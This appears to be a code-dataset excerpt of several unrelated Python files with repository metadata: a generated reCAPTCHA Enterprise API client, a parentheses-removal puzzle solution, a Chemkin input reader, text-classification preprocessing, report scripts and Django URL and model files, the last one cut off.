py
|
"""Generated client library for recaptchaenterprise version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.recaptchaenterprise.v1 import recaptchaenterprise_v1_messages as messages
class RecaptchaenterpriseV1(base_api.BaseApiClient):
"""Generated client library for service recaptchaenterprise version v1."""
MESSAGES_MODULE = messages
BASE_URL = 'https://recaptchaenterprise.googleapis.com/'
MTLS_BASE_URL = 'https://recaptchaenterprise.mtls.googleapis.com/'
_PACKAGE = 'recaptchaenterprise'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
_VERSION = 'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'RecaptchaenterpriseV1'
_URL_VERSION = 'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new recaptchaenterprise handle."""
url = url or self.BASE_URL
super(RecaptchaenterpriseV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.projects_assessments = self.ProjectsAssessmentsService(self)
self.projects_keys = self.ProjectsKeysService(self)
self.projects = self.ProjectsService(self)
class ProjectsAssessmentsService(base_api.BaseApiService):
"""Service class for the projects_assessments resource."""
_NAME = 'projects_assessments'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsAssessmentsService, self).__init__(client)
self._upload_configs = {
}
def Annotate(self, request, global_params=None):
r"""Annotates a previously created Assessment to provide additional information.
on whether the event turned out to be authentic or fradulent.
Args:
request: (RecaptchaenterpriseProjectsAssessmentsAnnotateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1AnnotateAssessmentResponse) The response message.
"""
config = self.GetMethodConfig('Annotate')
return self._RunMethod(
config, request, global_params=global_params)
Annotate.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/assessments/{assessmentsId}:annotate',
http_method='POST',
method_id='recaptchaenterprise.projects.assessments.annotate',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:annotate',
request_field='googleCloudRecaptchaenterpriseV1AnnotateAssessmentRequest',
request_type_name='RecaptchaenterpriseProjectsAssessmentsAnnotateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1AnnotateAssessmentResponse',
supports_download=False,
)
def Create(self, request, global_params=None):
r"""Creates an Assessment of the likelihood an event is legitimate.
Args:
request: (RecaptchaenterpriseProjectsAssessmentsCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Assessment) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/assessments',
http_method='POST',
method_id='recaptchaenterprise.projects.assessments.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/assessments',
request_field='googleCloudRecaptchaenterpriseV1Assessment',
request_type_name='RecaptchaenterpriseProjectsAssessmentsCreateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Assessment',
supports_download=False,
)
class ProjectsKeysService(base_api.BaseApiService):
"""Service class for the projects_keys resource."""
_NAME = 'projects_keys'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsKeysService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
r"""Creates a new reCAPTCHA Enterprise key.
Args:
request: (RecaptchaenterpriseProjectsKeysCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys',
http_method='POST',
method_id='recaptchaenterprise.projects.keys.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/keys',
request_field='googleCloudRecaptchaenterpriseV1Key',
request_type_name='RecaptchaenterpriseProjectsKeysCreateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleProtobufEmpty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='DELETE',
method_id='recaptchaenterprise.projects.keys.delete',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysDeleteRequest',
response_type_name='GoogleProtobufEmpty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Returns the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='GET',
method_id='recaptchaenterprise.projects.keys.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysGetRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Returns the list of all keys that belong to a project.
Args:
request: (RecaptchaenterpriseProjectsKeysListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1ListKeysResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys',
http_method='GET',
method_id='recaptchaenterprise.projects.keys.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['pageSize', 'pageToken'],
relative_path='v1/{+parent}/keys',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysListRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1ListKeysResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
r"""Updates the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='PATCH',
method_id='recaptchaenterprise.projects.keys.patch',
ordered_params=['name'],
path_params=['name'],
query_params=['updateMask'],
relative_path='v1/{+name}',
request_field='googleCloudRecaptchaenterpriseV1Key',
request_type_name='RecaptchaenterpriseProjectsKeysPatchRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = 'projects'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
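# A minimal usage sketch (not part of the generated file; assumes default
# gcloud credentials and an existing project, whose name is hypothetical):
#   client = RecaptchaenterpriseV1()
#   request = messages.RecaptchaenterpriseProjectsKeysListRequest(
#       parent='projects/my-project')
#   response = client.projects_keys.List(request)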
|
[
"[email protected]"
] | |
602bf5ff185fae424574e01f0d60bafdc9fad426
|
9d032e9864ebda8351e98ee7950c34ce5168b3b6
|
/301.py
|
10f8978082ea2c4ee7bbac60f631a00e920d68cf
|
[] |
no_license
|
snpushpi/P_solving
|
e0daa4809c2a3612ba14d7bff49befa7e0fe252b
|
9980f32878a50c6838613d71a8ee02f492c2ce2c
|
refs/heads/master
| 2022-11-30T15:09:47.890519 | 2020-08-16T02:32:49 | 2020-08-16T02:32:49 | 275,273,765 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,269 |
py
|
'''
Remove the minimum number of invalid parentheses in order to make the input string valid. Return all possible results.
Note: The input string may contain letters other than the parentheses ( and ).
Example 1:
Input: "()())()"
Output: ["()()()", "(())()"]
Example 2:
Input: "(a)())()"
Output: ["(a)()()", "(a())()"]
Example 3:
Input: ")("
Output: [""]
'''
def validstring(string):
count = 0
for char in string:
if char=='(':
count+=1
elif char==')':
count-=1
if count<0:
return False
return (count==0)
def main(input_string):
l = len(input_string)
queue = [input_string]
visited = set()
visited.add(input_string)
level = False
result = []
while queue:
new_str = queue.pop(0)
if validstring(new_str):
result.append(new_str)
level= True
if level:
continue
for i in range(len(new_str)):
if not (new_str[i]==')' or new_str[i]=='('):
continue
part_string = new_str[:i]+new_str[i+1:]
if part_string not in visited:
visited.add(part_string)
queue.append(part_string)
return result
print(main("()())()"))
|
[
"[email protected]"
] | |
6bf0a913bcc4d96db71c5ad8e16ab1214ef394f8
|
51bd1f17a4e9942128b2c0824d397ebb74067e4c
|
/py_box3/mkm/chemkin/__init__.py
|
9f2981ce6f8ee408e5b347aef0ba9261ee2bc6fb
|
[] |
no_license
|
jonlym/py_box
|
3290db8fab2ca97fbd348d02ae4a3319207ccfb0
|
ae5187a433ef654d6b96ee98ca7ab742d83d11d9
|
refs/heads/master
| 2021-01-19T05:42:10.056427 | 2018-12-20T18:44:01 | 2018-12-20T18:44:01 | 87,442,931 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,054 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 23 14:57:39 2016
@author: Jonathan Lym
"""
from py_box3.constants import T0, convert_unit
from ase.io import read
from py_box3.thermo.thermdat import Thermdat
from py_box3.thermo.thermdats import Thermdats
import numpy as np
import os
from copy import copy
class Chemkin(object):
def __init__(self,
species = None,
sites = None,
reactions = None,
BEPs = None,
LSRs = None,
DOEs = None,
GAs = None,
SAs = None,
StatpQ = None,
reactor_type = 1,
n_runs = 1,
multi_input = True,
standard_T_and_P = True,
Ts = [],
Ps = [],
Qs = [],
SA_Vs = [],
T_rise = 0.,
isothermal = True,
linear_T_ramp = False,
external_T = 923.,
heat_transfer_area_to_volume = 3.571,
heat_transfer_coefficient = 0.,
TPD_ramp = 0.,
MARI = '',
reactant = '',
volume = 100.,
nnodes = 1,
ttout = 1.e-2,
rtime = 1.e-4,
ntdec = 10.,
save_transient = False,
set_equation_tolerance = True,
absolute_tolerance = 1.e-10,
relative_tolerance = 1.e-8,
non_negative_composition = True,
restart_max = 0,
use_iterative_solver = False,
upper_bandwidth = 0,
lower_bandwidth = 0,
use_coverage_effects = False,
use_binding_energy_corrections = False,
use_BEPs = False,
use_LSRs = False,
use_different_activation_energy = False,
use_omega = False,
omega = 0.5,
T_ref = 1.,
reaction_path_analysis_mode = 1,
verbose_reaction_path_analysis = False,
reaction_path_analysis_T = 900.,
sensitivity_analysis = False,
design_of_experiments = False):
#Objects
self.species = species
self.sites = sites
self.reactions = reactions
self.BEPs = BEPs
self.LSRs = LSRs
self.DOEs = DOEs
self.GAs = GAs
self.SAs = SAs
self.StatpQ = StatpQ
#Reactor parameters
self.reactor_type = reactor_type
self.n_runs = n_runs
self.multi_input = multi_input
self.standard_T_and_P = standard_T_and_P
self.Ts = Ts
self.Ps = Ps
self.Qs = Qs
self.SA_Vs = SA_Vs
self.T_rise = T_rise
self.external_T = external_T
self.heat_transfer_area_to_volume = heat_transfer_area_to_volume
self.heat_transfer_coefficient = heat_transfer_coefficient
self.TPD_ramp = TPD_ramp
self.MARI = MARI
self.reactant = reactant
self.volume = volume
#Reactor Options
self.isothermal = isothermal
self.linear_T_ramp = linear_T_ramp
#Solver options
self.nnodes = nnodes
self.ttout = ttout
self.rtime = rtime
self.ntdec = ntdec
self.save_transient = save_transient
self.set_equation_tolerance = set_equation_tolerance
self.absolute_tolerance = absolute_tolerance
self.relative_tolerance = relative_tolerance
self.non_negative_composition = non_negative_composition
self.restart_max = restart_max
self.use_iterative_solver = use_iterative_solver
self.upper_bandwidth = upper_bandwidth
self.lower_bandwidth = lower_bandwidth
#Reaction options
self.use_coverage_effects = use_coverage_effects
self.use_binding_energy_corrections = use_binding_energy_corrections
self.use_BEPs = use_BEPs
self.use_LSRs = use_LSRs
self.use_different_activation_energy = use_different_activation_energy
self.use_omega = use_omega
self.omega = omega
self.T_ref = T_ref
#Output options
self.reaction_path_analysis_mode = reaction_path_analysis_mode
self.verbose_reaction_path_analysis = verbose_reaction_path_analysis
self.reaction_path_analysis_T = reaction_path_analysis_T
self.sensitivity_analysis = sensitivity_analysis
self.design_of_experiments = design_of_experiments
    @classmethod
    def from_INP(cls, path = '.'):
        # NOTE: Sites, Species, Reactions, BEPs, LSRs, DOEs, GAs, SAs and StatpQ
        # are expected to come from elsewhere in py_box3; their imports are not
        # shown in this file.
        sites = Sites.from_surf_inp(path = os.path.join(path, 'surf.inp'))
        species = Species.from_thermdat(path = os.path.join(path, 'thermdat'))
        species.get_sites(path = os.path.join(path, 'surf.inp'))
        gas_reactions = Reactions.from_gas_inp(path = os.path.join(path, 'gas.inp'))
        surf_reactions = Reactions.from_surf_inp(path = os.path.join(path, 'surf.inp'))
        reactions = copy(gas_reactions)
        reactions.extend(copy(surf_reactions))
        input_dict = cls.read_tube_inp(path = os.path.join(path, 'tube.inp'), return_dict = True)
        #Optional Objects
        if input_dict['use_BEPs']:
            input_dict['BEPs'] = BEPs.from_BEP_inp(path = os.path.join(path, 'BEP.inp'))
        if input_dict['use_LSRs']:
            input_dict['LSRs'] = LSRs.from_Scale_inp(path = os.path.join(path, 'Scale.inp'))
        if input_dict['design_of_experiments']:
            input_dict['DOEs'] = DOEs.from_DOE_inp(path = os.path.join(path, 'DOE.inp'))
        if input_dict.get('use_GAs'): # 'use_GAs' is not written by read_tube_inp
            input_dict['GAs'] = GAs.from_GA_inp(path = os.path.join(path, 'GA.inp'))
        if input_dict['sensitivity_analysis']:
            input_dict['SAs'] = SAs.from_SA_inp(path = os.path.join(path, 'SA.inp'))
        if input_dict['use_binding_energy_corrections']:
            input_dict['StatpQ'] = StatpQ.from_StatpQ_inp(path = os.path.join(path, 'StatpQ.inp'))
        if input_dict['multi_input']:
            (Ts, Ps, Qs, SA_Vs) = cls.read_T_flow_inp(path = os.path.join(path, 'T_flow.inp'))
            # pass the multi-run conditions through to the constructor
            input_dict.update(Ts = Ts, Ps = Ps, Qs = Qs, SA_Vs = SA_Vs)
        if input_dict['use_different_activation_energy']:
            reactions.read_EAs_inp(path = os.path.join(path, 'EAs.inp'))
            reactions.read_EAg_inp(path = os.path.join(path, 'EAg.inp'))
        return cls(species = species, sites = sites, reactions = reactions, **input_dict)
    @staticmethod
    def read_tube_inp(path = 'tube.inp', return_dict = True):
tube_dict = dict()
with open(path, 'r') as f_ptr:
i = 0
for line in f_ptr:
#Skip lines
if '!' == line[0] or 'EOF' in line:
continue
data = [x for x in line.replace('\n', '').split(' ') if x != '']
if i == 0:
tube_dict['reactor_type'] = int(data[0])
tube_dict['n_runs'] = int(data[1])
tube_dict['multi_input'] = char_to_boolean(data[2])
elif i == 1:
tube_dict['standard_T_and_P'] = char_to_boolean(data[0])
tube_dict['Ts'] = [float(data[1])]
tube_dict['Ps'] = [float(data[2])]
tube_dict['Qs'] = [float(data[3])]
tube_dict['SA_Vs'] = [float(data[4])]
tube_dict['T_rise'] = float(data[5])
elif i == 2:
tube_dict['isothermal'] = char_to_boolean(data[0])
tube_dict['linear_T_ramp'] = int(data[1])
elif i == 3:
tube_dict['external_T'] = float(data[0])
tube_dict['heat_transfer_area_to_volume'] = float(data[1])
tube_dict['heat_transfer_coefficient'] = float(data[2])
tube_dict['TPD_ramp'] = float(data[3])
elif i == 4:
tube_dict['MARI'] = data[0]
tube_dict['reactant'] = data[1]
elif i == 5:
tube_dict['volume'] = float(data[0])
tube_dict['nnodes'] = int(data[1])
tube_dict['ttout'] = float(data[2])
tube_dict['rtime'] = float(data[3])
tube_dict['ntdec'] = int(data[4])
tube_dict['save_transient'] = char_to_boolean(data[5])
elif i == 6:
tube_dict['set_equation_tolerance'] = char_to_boolean(data[0])
tube_dict['absolute_tolerance'] = float(data[1])
tube_dict['relative_tolerance'] = float(data[2])
tube_dict['non_negative_composition'] = char_to_boolean(data[3])
tube_dict['restart_max'] = int(data[4])
elif i == 7:
if data[0] == '0':
tube_dict['use_iterative_solver'] = False
elif data[0] == '1':
tube_dict['use_iterative_solver'] = True
else:
raise Exception('Invalid value for iSolver, {}'.format(data[0]))
tube_dict['upper_bandwidth'] = int(data[1])
tube_dict['lower_bandwidth'] = int(data[2])
elif i == 8:
tube_dict['use_coverage_effects'] = char_to_boolean(data[0])
tube_dict['use_binding_energy_corrections'] = char_to_boolean(data[1])
tube_dict['use_BEPs'] = char_to_boolean(data[2])
if data[3] == '0':
tube_dict['use_LSRs'] = False
elif data[3] == '3':
tube_dict['use_LSRs'] = True
else:
raise Exception('Invalid value for iScale, {}'.format(data[3]))
tube_dict['use_different_activation_energy'] = char_to_boolean(data[4])
tube_dict['use_omega'] = char_to_boolean(data[5])
tube_dict['omega'] = float(data[6])
tube_dict['T_ref'] = float(data[7])
elif i == 9:
tube_dict['reaction_path_analysis_mode'] = int(data[0])
tube_dict['verbose_reaction_path_analysis'] = char_to_boolean(data[1])
tube_dict['reaction_path_analysis_T'] = float(data[2])
tube_dict['sensitivity_analysis'] = char_to_boolean(data[3])
tube_dict['design_of_experiments'] = char_to_boolean(data[4])
i += 1
return tube_dict
def write_tube_inp(self, path = 'tube.inp'):
lines = []
lines.append('!irxtr (0=UHV/mol. beam, 1=batch, 2=cstr, 3=pfr) nruns MultiInput')
#lines.append('{}{}{}{}{}'.format(self.reactor_type))
lines.append('!lstp t[K] p[atm] velo[cm3/s] abyv[cm-1] trise[K]')
lines.append('!liso(yes=T,no=F) itpd (0=no, 1=UHV, 2=High Pressure) (itpd overrides liso)')
lines.append('!text aextbyv htc ramp [K/s]')
lines.append('!MARI Reactant')
lines.append('!rlen[cm3] nnodes ttout [s] rtime [s] ntdec ltra (F=only SS saved, T=transient saved)')
lines.append('!ltol abstol reltol NonNeg(F/T: constraints off/on) restart_max (<=0 means no limit)')
lines.append('!iSolver (0/1: iterative solver off/on) mu ml (upper/lower bandwidths for Krylov solver)')
lines.append('!lcov lStatpQ lBEP iScale lEA lomega omega Tref_beta (0: Tref=300K; 1: Tref=1K)')
lines.append('!mrpa verbose_rpa trpa lsen lDOE')
lines.append('EOF')
with open(path, 'w') as f_ptr:
            f_ptr.write('\n'.join(lines) + '\n')
def char_to_boolean(character):
if character.lower() == 't':
return True
elif character.lower() == 'f':
return False
else:
raise Exception('Invalid character, {}'.format(character))
def boolean_to_char(boolean):
if boolean:
return 'T'
else:
return 'F'
|
[
"[email protected]"
] | |
7ed42131d1dea6425f48f5cd8d6a580ebe0e2de1
|
8d150f92db0e12dcb32791892c0747ee50194cbb
|
/ex_01.py
|
120378ee94c80dc0412ae742805442adf5f209f5
|
[] |
no_license
|
wangbingde/class_day02
|
cbe1302668aa1cfe6b6a715ede149854627dc3ea
|
215cd1abb15bb31b70c62e344fe7e611a79a75b1
|
refs/heads/master
| 2020-04-07T07:10:59.613331 | 2018-11-19T05:33:51 | 2018-11-19T05:33:51 | 158,167,125 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 422 |
py
|
# Single inheritance
class Animal:
def eat(self):
print("吃")
def drink(self):
print("喝")
def run(self):
print("跑")
def sleep(self):
print("睡--")
class Dog(Animal):
def bark(self):
print("汪汪叫")
class XiaoTian(Dog):
def fly(self):
print("会飞")
wangcai =Dog()
wangcai.sleep()
wangcai.bark()
xiao=XiaoTian()
xiao.bark()
xiao.fly()
|
[
"[email protected]"
] | |
0285e95057b21742ade89d9041421eb988eb90fb
|
d79c152d072edd6631e22f886c8beaafe45aab04
|
/nicolock/products/rest_urls.py
|
d58d9a92a31372b447067ee3dd7508ef1d810182
|
[] |
no_license
|
kabroncelli/Nicolock
|
764364de8aa146721b2678c14be808a452d7a363
|
4c4343a9117b7eba8cf1daf7241de549b9a1be3b
|
refs/heads/master
| 2020-03-11T11:02:43.074373 | 2018-04-18T17:38:33 | 2018-04-18T17:38:33 | 129,959,455 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 690 |
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url
from . import rest_views as views
urlpatterns = [
url(
regex=r'^products/(?P<pk>\d+)/$',
view=views.ProductDetail.as_view(),
name='product-detail'
),
url(
regex=r'^products/(?P<pk>\d+)/like/$',
view=views.ProductLike.as_view(),
name='product-like'
),
url(
regex=r'^categories/$',
view=views.CategoryList.as_view(),
name='category-list'
),
url(
regex=r'^categories/(?P<pk>\d+)/$',
view=views.CategoryDetail.as_view(),
name='category-detail'
),
]
|
[
"[email protected]"
] | |
2864f464a2a9b812262b8d20279d25c2d4d19566
|
e75d2b20e7afade2c9778ab5b68369d482cb9fd0
|
/Desafio007.py
|
d957e19b9877e2391eabb33cd577d0d1a74e3f22
|
[] |
no_license
|
tamaragmnunes/Exerc-cios-extra---curso-python
|
e09bb6e507e0b1c5a3f84ecec7dbb25b8aaf27f4
|
5bfd2674101f2f41001adcf3b65414b3ef6b57ba
|
refs/heads/master
| 2020-07-26T09:10:54.536729 | 2019-09-15T13:45:06 | 2019-09-15T13:45:06 | 208,599,544 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 236 |
py
|
#Develop a program that reads a student's two grades, then calculates and displays the average
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m =(n1+n2)/2
print('A sua média é {}'.format(m))
|
[
"[email protected]"
] | |
d3527c75633bd397f54893cab6262bed50e53879
|
d17d65a3ee48b307a46a0b95a05f04131668edbe
|
/TestSuite/runner.py
|
6a172fc2702d50f5b6f0558a2beab1d4f677a319
|
[] |
no_license
|
qlcfj001/ui_test
|
28fa370a6f912b2ff9a551c681d35a452c57ee02
|
25020af19d84c9c2b1bad02aca89cc881e828bbb
|
refs/heads/master
| 2023-06-15T18:10:02.177702 | 2021-07-15T06:35:10 | 2021-07-15T06:35:10 | 386,012,875 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 376 |
py
|
from Page.Base import base
from pageobjct.SearcH import Searchpage
from selenium.webdriver.common.by import By
#from TestSuite.Variablelayer.Variable import *
import time
import unittest
leave='成都'
leave_data="2021-07-20"
arrive='北京'
arrive_data='2021-07-30'
aa=Searchpage()
aa.search7(leave=leave, leave_data=leave_data, arrive=arrive, arrive_data=arrive_data)
|
[
"[email protected]"
] | |
b7c9571822e30c675a4bbb00ce1a6faff3a0bc1f
|
7274ce2b75d49a90c57e9220756bc9beb532c9e1
|
/preprocess/main_newsgroup_preprocess.py
|
36536c615b9bbfb43c48daa740c439bcd3c1effb
|
[] |
no_license
|
chauncyzhu/textclassification
|
4eb03f2b11abd67680daab24f373971ce33d89cd
|
0b3960f748ba66278250132d8b16d189cabe4a3f
|
refs/heads/master
| 2021-01-19T08:59:13.889878 | 2018-03-10T05:38:19 | 2018-03-10T05:38:19 | 87,704,238 | 2 | 0 | null | null | null | null |
GB18030
|
Python
| false | false | 3,853 |
py
|
# coding=gbk
import preprocess.data_clean.newsgroup.import_data as id
import preprocess.data_clean.newsgroup.clean_data as cd
import utils.newsgroup_path as path
import preprocess.transfer_vector.voca_dict.voca_data as vd #the part that can be shared
import preprocess.transfer_vector.generate_vector.feature as feature
import preprocess.transfer_vector.generate_vector.transfer_vector as tv
"""
对函数进行调用,下面部分主要是对20newsgroup语料库进行处理
"""
CONFIRM_POS_CLASS = 0 #指定二分类正类序号
#数据清理和字典获取,多分类和二分类的class_num不一样
def __voca_dict(class_num,voca_csv=None):
    #Read the data and convert it to DataFrames
    #pd_train, pd_test = id.getTrainAndTest(path.SOURCEFILE) #if the train and test sets need to be read separately
    pd_train = id.getPDData(path.TRAIN_TEXT)
    pd_test = id.getPDData(path.TEST_TEXT)
    cd.clean_data(pd_train) #tokenize (additional cleaning can be done here if needed)
    cd.clean_data(pd_test)
    # Build the class vocabulary: class_num > 2 for multi-class, class_num = 2 for binary classification
    # pd_train = pd_train.head(100) #limit the number of training samples
    voca_dict = vd.getRelativeValue(pd_train, vd.getUniqueVocabulary(pd_train),
                                    class_num) # getUniqueVocabulary is slow, so its result is stored in a csv
    # Add more term-weighting schemes here if needed
    feature.getBDCVector(voca_dict, class_num, "bdc") # compute BDC values from the vocabulary; the index must be specified
    #feature.getDFBDCVector(voca_dict, class_num, "df_bdc") # compute DF_BDC values from the vocabulary; the index must be specified
    feature.getTotalVoca(pd_test, voca_dict) # add the features of the test set to the vocabulary
    if voca_csv: # write the vocabulary to file if a path was given
voca_dict.to_csv(voca_csv)
print(voca_dict)
return pd_train, pd_test, voca_dict
#Convert the data to different feature-vector representations
def __generate_vector(pd_train,pd_test,voca_dict,feature_name,train_csv=None,test_csv=None):
    pd_train_copy = pd_train.copy() #copy to avoid interfering with the original data
    pd_test_copy = pd_test.copy()
    # Convert the train and test sets to vectors
tv.changeToFeatureVector(pd_train_copy, voca_dict, feature_name)
tv.changeToFeatureVector(pd_test_copy, voca_dict, feature_name)
    if train_csv:
        pd_train_copy.to_csv(train_csv) #write the training file
    if test_csv:
        pd_test_copy.to_csv(test_csv) #write the test file
#Data processing for multi-class classification
def multi_class_data():
    class_num = 20 # number of classes for the multi-class case; the original note says newsgroup has at most 6 categories
    pd_train, pd_test,voca_dict = __voca_dict(class_num, voca_csv=path.VOCA_MULTI_CSV) #build the multi-class vocabulary
    __generate_vector(pd_train, pd_test, voca_dict,"bdc", train_csv=path.TRAIN_MULTI_BDC_CSV, test_csv=path.TEST_MULTI_BDC_CSV)
    #__generate_vector(pd_train, pd_test, voca_dict,"df_bdc", train_csv=path.TRAIN_MULTI_DF_BDC_CSV, test_csv=path.TEST_MULTI_DF_BDC_CSV)
#Build the binary-classification data
def binary_class_data():
    class_num = 2 # number of classes for the binary case
    pd_train, pd_test,voca_dict = __voca_dict(class_num, voca_csv=path.VOCA_BINARY_CSV) #build the binary-classification vocabulary
    # Change the binary class labels according to the designated positive class
def f(x):
if x[CONFIRM_POS_CLASS] == 1:
return [1, 0]
else:
return [0, 1]
pd_train['class'] = pd_train['class'].apply(f)
pd_test['class'] = pd_test['class'].apply(f)
__generate_vector(pd_train, pd_test, voca_dict,"bdc", train_csv=path.TRAIN_BINARY_BDC_CSV, test_csv=path.TEST_BINARY_BDC_CSV)
__generate_vector(pd_train, pd_test, voca_dict,"df_bdc", train_csv=path.TRAIN_BINARY_DF_BDC_CSV, test_csv=path.TEST_BINARY_DF_BDC_CSV)
if __name__ == '__main__':
multi_class_data()
#binary_class_data()
|
[
"[email protected]"
] | |
719be2b3109d684559aae549572f8a866a01604c
|
f576a300274a5f491d60a2fbd06b276dac65a5da
|
/volumes.py
|
0a9a83f7c188b30aa4838f056887c48563f2e116
|
[] |
no_license
|
kashley007/SurgicalVolumes
|
76d81327987c7bf280ffd1a33057ae00495a1797
|
a5952f2cc169f45ad1fb9e3076e504f9443ed473
|
refs/heads/master
| 2020-07-21T19:36:50.317517 | 2016-11-16T17:25:07 | 2016-11-16T17:25:07 | 73,842,318 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,660 |
py
|
"""
This module executes the calculation of OR volumes
and creates a pdf report for each location found in the
data set
"""
#Import Libraries----------------------------------------------------------
import calendar
import command_line_args
import import_from_excel
import PDF
import df_manip
import endo
#--------------------------------------------------------------------------
def run_volumes_report(df, args):
"""Run a volumes report taking the parameters of df(DataFrame) and args(command-line arguments)"""
#Get all locations
location_df = df.Location.unique()
location_df = sorted(location_df, reverse=True)
if (args.month and args.year):
month_num = int(args.month)
month = calendar.month_name[month_num]
year = int(args.year)
df_month_year = df_manip.apply_month_year_filter(df, month_num, year)
total_case = 0
for i in location_df:
#Get data for month and year given at command-line
df_location = df_manip.apply_location_filter(df_month_year,i)
if(i == 'CRMH MAIN OR' ):
df_endo = endo.get_endo_cases(df_location)
total_case = len(df_endo.index)
#create PDF for location_df[i]
PDF.create_pdf(df_location, month, year, i, total_case)
else:
print("Not yet built")
#--------------------------------------------------------------------------
def main():
"""Main Program Execution"""
args = command_line_args.handle_command_line_args()
df = import_from_excel.get_excel_data(args)
run_volumes_report(df, args)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
0c081fd0cf2dee0806a9c57bd30da55b4a4b8187
|
6c4faabeddafecdbe11d1f8250dbff620e03fa07
|
/listings/models.py
|
1339df6f0d4266275c5abe1b27349a86d9834151
|
[] |
no_license
|
donnyboi/btre
|
20565e7c1a6411c808b38a72645a96c0d3196b44
|
174671348e680241a9af50b379595fc817596488
|
refs/heads/master
| 2020-11-26T05:08:01.996657 | 2020-03-19T07:50:13 | 2020-03-19T07:50:13 | 228,972,059 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,508 |
py
|
from django.db import models
from datetime import datetime
from realtors.models import Realtor
# Create your models here.
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
